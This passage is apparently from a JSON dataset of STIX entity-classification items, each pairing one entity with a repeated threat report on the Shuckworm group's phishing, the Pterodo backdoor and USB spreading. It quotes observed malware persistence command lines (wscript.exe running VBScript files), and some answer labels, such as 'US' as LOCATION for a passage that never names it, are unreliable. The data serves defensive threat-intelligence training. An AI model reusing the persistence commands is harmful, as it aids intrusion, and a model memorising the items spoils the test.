in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nPterodo\n\n---\n\n### Text Passage:\nShuckworm tactics, techniques, and procedures\nShuckworm is known to use phishing emails as an initial infection vector, in order to gain access to victim machines and distribute malware. The attackers send emails with malicious attachments to Ukrainian victims, with the attachments of various file types, such as:\n* .docx\n* .rar (RAR archive files)\n* .sfx (self-extracting archives)\n* .lnk\n* .hta (HTML smuggling files)\nThe victim lures we observed related to armed conflicts, criminal proceedings, combating crime, and protection of children, among others.\nOnce victims were infected, the attackers then proceed to download additional backdoors and tools onto targeted machines.\nShuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor malware, Pterodo, via USB. Researchers from Symantec, part of Broadcom, blogged about Backdoor.Pterodo in April 2022, documenting how we had found four variants of the backdoor with similar functionality. The variants are Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code from a command-and-control (C&C) server.\nExamples of recent scheduled tasks include execution of the following command lines:\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\appdata\\local\\temp\\desert\" //e:vbscript //b /dmc /j2k /spl /nff\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\favorites\\jumper.asf\" //e:vbscript //b /asf /mdf /nab /apk\n* wscript.exe \"C:\\Users\\\\[REDACTED]\\Contacts\\delightful.abk\" //e:vbscript //b /cfg /mdm /cfm /mp4\nThe new PowerShell script is used to first copy itself onto the infected machine and create a shortcut file using an _rtk.lnk_ extension. The script uses file names such as \u201cporn_video.rtf.lnk\u201d, \u201cdo_not_delete.rtf.lnk\u201d\u201d and \u201cevidence.rtf.lnk\u201d in an attempt to entice individuals to open the files. These file names are generally in Ukrainian, but some are also in English.\nNext, the script enumerates all drives, copying itself to any available removable disks \u2013 USB drives. These USB drives are likely used by the attackers for lateral movement across victim networks and may be used to help the attackers reach air-gapped machines within targeted organizations.\nIn this recent activity, we also observed the group leveraging legitimate services to act as C&C servers, including using the Telegram messaging service for its C&C infrastructure. More recently, they have also used Telegram\u2019s micro-blogging platform, called Telegraph, to store C&C addresses.\nFigure 1. Threat actors use Telegraph to store C&C addresses\nShuckworm tends to only use its C&C infrastructure for short periods of time, limiting the usefulness of its C&Cs when it comes to finding more activity or linking activity together. However, the group does use SSL certificates that have some commonalities that may be leveraged for tracking purposes. We believe the group is likely leveraging pre-configured images for use in its C&C deployment. These data points can help researchers to identify additional C&C infrastructure and Shuckworm activity.\nSymantec also saw what was likely Giddome, an infostealer tool that is a known Shuckworm backdoor, deployed onto victim networks to steal and exfiltrate data of interest.\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nwscript.exe\n\n---\n\n### Text Passage:\nShuckworm tactics, techniques, and procedures\nShuckworm is known to use phishing emails as an initial infection vector, in order to gain access to victim machines and distribute malware. The attackers send emails with malicious attachments to Ukrainian victims, with the attachments of various file types, such as:\n* .docx\n* .rar (RAR archive files)\n* .sfx (self-extracting archives)\n* .lnk\n* .hta (HTML smuggling files)\nThe victim lures we observed related to armed conflicts, criminal proceedings, combating crime, and protection of children, among others.\nOnce victims were infected, the attackers then proceed to download additional backdoors and tools onto targeted machines.\nShuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor malware, Pterodo, via USB. Researchers from Symantec, part of Broadcom, blogged about Backdoor.Pterodo in April 2022, documenting how we had found four variants of the backdoor with similar functionality. The variants are Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code from a command-and-control (C&C) server.\nExamples of recent scheduled tasks include execution of the following command lines:\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\appdata\\local\\temp\\desert\" //e:vbscript //b /dmc /j2k /spl /nff\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\favorites\\jumper.asf\" //e:vbscript //b /asf /mdf /nab /apk\n* wscript.exe \"C:\\Users\\\\[REDACTED]\\Contacts\\delightful.abk\" //e:vbscript //b /cfg /mdm /cfm /mp4\nThe new PowerShell script is used to first copy itself onto the infected machine and create a shortcut file using an _rtk.lnk_ extension. The script uses file names such as \u201cporn_video.rtf.lnk\u201d, \u201cdo_not_delete.rtf.lnk\u201d\u201d and \u201cevidence.rtf.lnk\u201d in an attempt to entice individuals to open the files. These file names are generally in Ukrainian, but some are also in English.\nNext, the script enumerates all drives, copying itself to any available removable disks \u2013 USB drives. These USB drives are likely used by the attackers for lateral movement across victim networks and may be used to help the attackers reach air-gapped machines within targeted organizations.\nIn this recent activity, we also observed the group leveraging legitimate services to act as C&C servers, including using the Telegram messaging service for its C&C infrastructure. More recently, they have also used Telegram\u2019s micro-blogging platform, called Telegraph, to store C&C addresses.\nFigure 1. Threat actors use Telegraph to store C&C addresses\nShuckworm tends to only use its C&C infrastructure for short periods of time, limiting the usefulness of its C&Cs when it comes to finding more activity or linking activity together. However, the group does use SSL certificates that have some commonalities that may be leveraged for tracking purposes. We believe the group is likely leveraging pre-configured images for use in its C&C deployment. These data points can help researchers to identify additional C&C infrastructure and Shuckworm activity.\nSymantec also saw what was likely Giddome, an infostealer tool that is a known Shuckworm backdoor, deployed onto victim networks to steal and exfiltrate data of interest.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nPowerShell\n\n---\n\n### Text Passage:\nShuckworm tactics, techniques, and procedures\nShuckworm is known to use phishing emails as an initial infection vector, in order to gain access to victim machines and distribute malware. The attackers send emails with malicious attachments to Ukrainian victims, with the attachments of various file types, such as:\n* .docx\n* .rar (RAR archive files)\n* .sfx (self-extracting archives)\n* .lnk\n* .hta (HTML smuggling files)\nThe victim lures we observed related to armed conflicts, criminal proceedings, combating crime, and protection of children, among others.\nOnce victims were infected, the attackers then proceed to download additional backdoors and tools onto targeted machines.\nShuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor malware, Pterodo, via USB. Researchers from Symantec, part of Broadcom, blogged about Backdoor.Pterodo in April 2022, documenting how we had found four variants of the backdoor with similar functionality. The variants are Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code from a command-and-control (C&C) server.\nExamples of recent scheduled tasks include execution of the following command lines:\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\appdata\\local\\temp\\desert\" //e:vbscript //b /dmc /j2k /spl /nff\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\favorites\\jumper.asf\" //e:vbscript //b /asf /mdf /nab /apk\n* wscript.exe \"C:\\Users\\\\[REDACTED]\\Contacts\\delightful.abk\" //e:vbscript //b /cfg /mdm /cfm /mp4\nThe new PowerShell script is used to first copy itself onto the infected machine and create a shortcut file using an _rtk.lnk_ extension. The script uses file names such as \u201cporn_video.rtf.lnk\u201d, \u201cdo_not_delete.rtf.lnk\u201d\u201d and \u201cevidence.rtf.lnk\u201d in an attempt to entice individuals to open the files. These file names are generally in Ukrainian, but some are also in English.\nNext, the script enumerates all drives, copying itself to any available removable disks \u2013 USB drives. These USB drives are likely used by the attackers for lateral movement across victim networks and may be used to help the attackers reach air-gapped machines within targeted organizations.\nIn this recent activity, we also observed the group leveraging legitimate services to act as C&C servers, including using the Telegram messaging service for its C&C infrastructure. More recently, they have also used Telegram\u2019s micro-blogging platform, called Telegraph, to store C&C addresses.\nFigure 1. Threat actors use Telegraph to store C&C addresses\nShuckworm tends to only use its C&C infrastructure for short periods of time, limiting the usefulness of its C&Cs when it comes to finding more activity or linking activity together. However, the group does use SSL certificates that have some commonalities that may be leveraged for tracking purposes. We believe the group is likely leveraging pre-configured images for use in its C&C deployment. These data points can help researchers to identify additional C&C infrastructure and Shuckworm activity.\nSymantec also saw what was likely Giddome, an infostealer tool that is a known Shuckworm backdoor, deployed onto victim networks to steal and exfiltrate data of interest.\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\njumper.asf\n\n---\n\n### Text Passage:\nShuckworm tactics, techniques, and procedures\nShuckworm is known to use phishing emails as an initial infection vector, in order to gain access to victim machines and distribute malware. The attackers send emails with malicious attachments to Ukrainian victims, with the attachments of various file types, such as:\n* .docx\n* .rar (RAR archive files)\n* .sfx (self-extracting archives)\n* .lnk\n* .hta (HTML smuggling files)\nThe victim lures we observed related to armed conflicts, criminal proceedings, combating crime, and protection of children, among others.\nOnce victims were infected, the attackers then proceed to download additional backdoors and tools onto targeted machines.\nShuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor malware, Pterodo, via USB. Researchers from Symantec, part of Broadcom, blogged about Backdoor.Pterodo in April 2022, documenting how we had found four variants of the backdoor with similar functionality. The variants are Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code from a command-and-control (C&C) server.\nExamples of recent scheduled tasks include execution of the following command lines:\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\appdata\\local\\temp\\desert\" //e:vbscript //b /dmc /j2k /spl /nff\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\favorites\\jumper.asf\" //e:vbscript //b /asf /mdf /nab /apk\n* wscript.exe \"C:\\Users\\\\[REDACTED]\\Contacts\\delightful.abk\" //e:vbscript //b /cfg /mdm /cfm /mp4\nThe new PowerShell script is used to first copy itself onto the infected machine and create a shortcut file using an _rtk.lnk_ extension. The script uses file names such as \u201cporn_video.rtf.lnk\u201d, \u201cdo_not_delete.rtf.lnk\u201d\u201d and \u201cevidence.rtf.lnk\u201d in an attempt to entice individuals to open the files. These file names are generally in Ukrainian, but some are also in English.\nNext, the script enumerates all drives, copying itself to any available removable disks \u2013 USB drives. These USB drives are likely used by the attackers for lateral movement across victim networks and may be used to help the attackers reach air-gapped machines within targeted organizations.\nIn this recent activity, we also observed the group leveraging legitimate services to act as C&C servers, including using the Telegram messaging service for its C&C infrastructure. More recently, they have also used Telegram\u2019s micro-blogging platform, called Telegraph, to store C&C addresses.\nFigure 1. Threat actors use Telegraph to store C&C addresses\nShuckworm tends to only use its C&C infrastructure for short periods of time, limiting the usefulness of its C&Cs when it comes to finding more activity or linking activity together. However, the group does use SSL certificates that have some commonalities that may be leveraged for tracking purposes. We believe the group is likely leveraging pre-configured images for use in its C&C deployment. These data points can help researchers to identify additional C&C infrastructure and Shuckworm activity.\nSymantec also saw what was likely Giddome, an infostealer tool that is a known Shuckworm backdoor, deployed onto victim networks to steal and exfiltrate data of interest.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nUS\n\n---\n\n### Text Passage:\nShuckworm tactics, techniques, and procedures\nShuckworm is known to use phishing emails as an initial infection vector, in order to gain access to victim machines and distribute malware. The attackers send emails with malicious attachments to Ukrainian victims, with the attachments of various file types, such as:\n* .docx\n* .rar (RAR archive files)\n* .sfx (self-extracting archives)\n* .lnk\n* .hta (HTML smuggling files)\nThe victim lures we observed related to armed conflicts, criminal proceedings, combating crime, and protection of children, among others.\nOnce victims were infected, the attackers then proceed to download additional backdoors and tools onto targeted machines.\nShuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor malware, Pterodo, via USB. Researchers from Symantec, part of Broadcom, blogged about Backdoor.Pterodo in April 2022, documenting how we had found four variants of the backdoor with similar functionality. The variants are Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code from a command-and-control (C&C) server.\nExamples of recent scheduled tasks include execution of the following command lines:\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\appdata\\local\\temp\\desert\" //e:vbscript //b /dmc /j2k /spl /nff\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\favorites\\jumper.asf\" //e:vbscript //b /asf /mdf /nab /apk\n* wscript.exe \"C:\\Users\\\\[REDACTED]\\Contacts\\delightful.abk\" //e:vbscript //b /cfg /mdm /cfm /mp4\nThe new PowerShell script is used to first copy itself onto the infected machine and create a shortcut file using an _rtk.lnk_ extension. The script uses file names such as \u201cporn_video.rtf.lnk\u201d, \u201cdo_not_delete.rtf.lnk\u201d\u201d and \u201cevidence.rtf.lnk\u201d in an attempt to entice individuals to open the files. These file names are generally in Ukrainian, but some are also in English.\nNext, the script enumerates all drives, copying itself to any available removable disks \u2013 USB drives. These USB drives are likely used by the attackers for lateral movement across victim networks and may be used to help the attackers reach air-gapped machines within targeted organizations.\nIn this recent activity, we also observed the group leveraging legitimate services to act as C&C servers, including using the Telegram messaging service for its C&C infrastructure. More recently, they have also used Telegram\u2019s micro-blogging platform, called Telegraph, to store C&C addresses.\nFigure 1. Threat actors use Telegraph to store C&C addresses\nShuckworm tends to only use its C&C infrastructure for short periods of time, limiting the usefulness of its C&Cs when it comes to finding more activity or linking activity together. However, the group does use SSL certificates that have some commonalities that may be leveraged for tracking purposes. We believe the group is likely leveraging pre-configured images for use in its C&C deployment. These data points can help researchers to identify additional C&C infrastructure and Shuckworm activity.\nSymantec also saw what was likely Giddome, an infostealer tool that is a known Shuckworm backdoor, deployed onto victim networks to steal and exfiltrate data of interest.\n",
"output": "LOCATION"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nShuckworm\n\n---\n\n### Text Passage:\nShuckworm tactics, techniques, and procedures\nShuckworm is known to use phishing emails as an initial infection vector, in order to gain access to victim machines and distribute malware. The attackers send emails with malicious attachments to Ukrainian victims, with the attachments of various file types, such as:\n* .docx\n* .rar (RAR archive files)\n* .sfx (self-extracting archives)\n* .lnk\n* .hta (HTML smuggling files)\nThe victim lures we observed related to armed conflicts, criminal proceedings, combating crime, and protection of children, among others.\nOnce victims were infected, the attackers then proceed to download additional backdoors and tools onto targeted machines.\nShuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor malware, Pterodo, via USB. Researchers from Symantec, part of Broadcom, blogged about Backdoor.Pterodo in April 2022, documenting how we had found four variants of the backdoor with similar functionality. The variants are Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code from a command-and-control (C&C) server.\nExamples of recent scheduled tasks include execution of the following command lines:\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\appdata\\local\\temp\\desert\" //e:vbscript //b /dmc /j2k /spl /nff\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\favorites\\jumper.asf\" //e:vbscript //b /asf /mdf /nab /apk\n* wscript.exe \"C:\\Users\\\\[REDACTED]\\Contacts\\delightful.abk\" //e:vbscript //b /cfg /mdm /cfm /mp4\nThe new PowerShell script is used to first copy itself onto the infected machine and create a shortcut file using an _rtk.lnk_ extension. The script uses file names such as \u201cporn_video.rtf.lnk\u201d, \u201cdo_not_delete.rtf.lnk\u201d\u201d and \u201cevidence.rtf.lnk\u201d in an attempt to entice individuals to open the files. These file names are generally in Ukrainian, but some are also in English.\nNext, the script enumerates all drives, copying itself to any available removable disks \u2013 USB drives. These USB drives are likely used by the attackers for lateral movement across victim networks and may be used to help the attackers reach air-gapped machines within targeted organizations.\nIn this recent activity, we also observed the group leveraging legitimate services to act as C&C servers, including using the Telegram messaging service for its C&C infrastructure. More recently, they have also used Telegram\u2019s micro-blogging platform, called Telegraph, to store C&C addresses.\nFigure 1. Threat actors use Telegraph to store C&C addresses\nShuckworm tends to only use its C&C infrastructure for short periods of time, limiting the usefulness of its C&Cs when it comes to finding more activity or linking activity together. However, the group does use SSL certificates that have some commonalities that may be leveraged for tracking purposes. We believe the group is likely leveraging pre-configured images for use in its C&C deployment. These data points can help researchers to identify additional C&C infrastructure and Shuckworm activity.\nSymantec also saw what was likely Giddome, an infostealer tool that is a known Shuckworm backdoor, deployed onto victim networks to steal and exfiltrate data of interest.\n",
"output": "THREAT_ACTOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nTelegram\n\n---\n\n### Text Passage:\nShuckworm tactics, techniques, and procedures\nShuckworm is known to use phishing emails as an initial infection vector, in order to gain access to victim machines and distribute malware. The attackers send emails with malicious attachments to Ukrainian victims, with the attachments of various file types, such as:\n* .docx\n* .rar (RAR archive files)\n* .sfx (self-extracting archives)\n* .lnk\n* .hta (HTML smuggling files)\nThe victim lures we observed related to armed conflicts, criminal proceedings, combating crime, and protection of children, among others.\nOnce victims were infected, the attackers then proceed to download additional backdoors and tools onto targeted machines.\nShuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor malware, Pterodo, via USB. Researchers from Symantec, part of Broadcom, blogged about Backdoor.Pterodo in April 2022, documenting how we had found four variants of the backdoor with similar functionality. The variants are Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code from a command-and-control (C&C) server.\nExamples of recent scheduled tasks include execution of the following command lines:\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\appdata\\local\\temp\\desert\" //e:vbscript //b /dmc /j2k /spl /nff\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\favorites\\jumper.asf\" //e:vbscript //b /asf /mdf /nab /apk\n* wscript.exe \"C:\\Users\\\\[REDACTED]\\Contacts\\delightful.abk\" //e:vbscript //b /cfg /mdm /cfm /mp4\nThe new PowerShell script is used to first copy itself onto the infected machine and create a shortcut file using an _rtk.lnk_ extension. The script uses file names such as \u201cporn_video.rtf.lnk\u201d, \u201cdo_not_delete.rtf.lnk\u201d\u201d and \u201cevidence.rtf.lnk\u201d in an attempt to entice individuals to open the files. These file names are generally in Ukrainian, but some are also in English.\nNext, the script enumerates all drives, copying itself to any available removable disks \u2013 USB drives. These USB drives are likely used by the attackers for lateral movement across victim networks and may be used to help the attackers reach air-gapped machines within targeted organizations.\nIn this recent activity, we also observed the group leveraging legitimate services to act as C&C servers, including using the Telegram messaging service for its C&C infrastructure. More recently, they have also used Telegram\u2019s micro-blogging platform, called Telegraph, to store C&C addresses.\nFigure 1. Threat actors use Telegraph to store C&C addresses\nShuckworm tends to only use its C&C infrastructure for short periods of time, limiting the usefulness of its C&Cs when it comes to finding more activity or linking activity together. However, the group does use SSL certificates that have some commonalities that may be leveraged for tracking purposes. We believe the group is likely leveraging pre-configured images for use in its C&C deployment. These data points can help researchers to identify additional C&C infrastructure and Shuckworm activity.\nSymantec also saw what was likely Giddome, an infostealer tool that is a known Shuckworm backdoor, deployed onto victim networks to steal and exfiltrate data of interest.\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents 